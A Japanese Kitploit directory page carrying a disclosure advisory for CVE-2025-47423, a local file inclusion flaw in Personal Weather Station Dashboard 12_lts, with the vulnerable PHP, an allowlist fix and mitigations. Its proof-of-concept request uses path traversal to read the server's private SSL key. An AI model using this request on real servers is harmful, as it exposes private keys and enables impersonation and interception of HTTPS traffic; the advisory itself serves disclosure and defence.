Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-47423 | Kitploit
ツール/GitHubGitHub/haluka92/cve-2025-47423
脆弱性分析エクスプロイトウェブアプリケーション悪用論文と研究学習と教育厳選リソース
GitHubhaluka92/cve-2025-47423

CVE-2025-47423

リポジトリを見る
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-47423 – Personal Weather Station Dashboard (12_lts) におけるローカルファイルインクルージョン

発見者: Matthew Eagle
ステータス: 公開開示
報告日: 2025-05-05
CVE ID: CVE-2025-47423


🧩 概要

Personal Weather Station Dashboard バージョン 12_lts におけるローカルファイルインクルージョン(LFI)の脆弱性により、認証されていないリモート攻撃者がサーバー上の任意のファイルを読み取ることができます。この欠陥を悪用すると、プライベートSSLキーを含む機密ファイルへのアクセスが可能になり、HTTPS接続の機密性と完全性が損なわれる可能性があります。


🛠 影響を受けるコンポーネント

  • ファイル: /others/_test.php
  • 脆弱なパラメータ: test(GET経由)

📈 影響

この脆弱性により、リモート攻撃者は以下が可能になります:

  • ファイルシステム上の任意のファイルを読み取る
  • プライベートSSLキー(例: server.key)を露出させる
  • 中間者(MITM)攻撃を実行する
  • HTTPSサーバーになりすます

CVSS: 5.8 中


💥 概念実証(PoC)

root@kitploit:~
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com

レスポンス:

root@kitploit:~
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----

🧪 脆弱なコード(簡略版)

root@kitploit:~
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);

str_replace はディレクトリトラバーサルを防ぐには不十分です。


🔐 安全な修正

  • インクルード対象に対して厳密な許可リストを使用する
  • basename() で入力をサニタイズし、許可されたファイルと照合する
  • ユーザー入力に基づく動的インクルードを避ける
root@kitploit:~
$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';

if (!in_array($script, $allowed_tests)) {
    die("Invalid test file.");
}

include(__DIR__ . '/scripts/' . $script);

📅 タイムライン

日付イベント
2025-05-05PWS Dashboardモデレーターに脆弱性を報告
2025-05-06確認とテストが実施された
2025-05-07MITRE経由でCVE-2025-47423を予約
TBD公開パッチとCVEリスト掲載は保留中

🧠 緩和策

Personal Weather Station Dashboard 12_lts を実行している場合は、以下を行う必要があります:

  • 直ちに _test.php を削除または更新する
  • ファイルの許可リストを使用した修正済みスクリプトを実装する
  • 侵害されたTLS証明書をすべてローテーションして再発行する

🧾 参考情報

  • MITREのCVE-2025-47423(保留中)
  • GitHubに掲載されたアドバイザリ

🙏 クレジット

脆弱性は Matthew Eagle によって発見され、責任を持って開示されました。
連絡先: [email protected]


本開示は、責任ある開示ガイドラインに沿って調整されています。この文書は教育および防御目的で公開されています。

ツールをダウンロード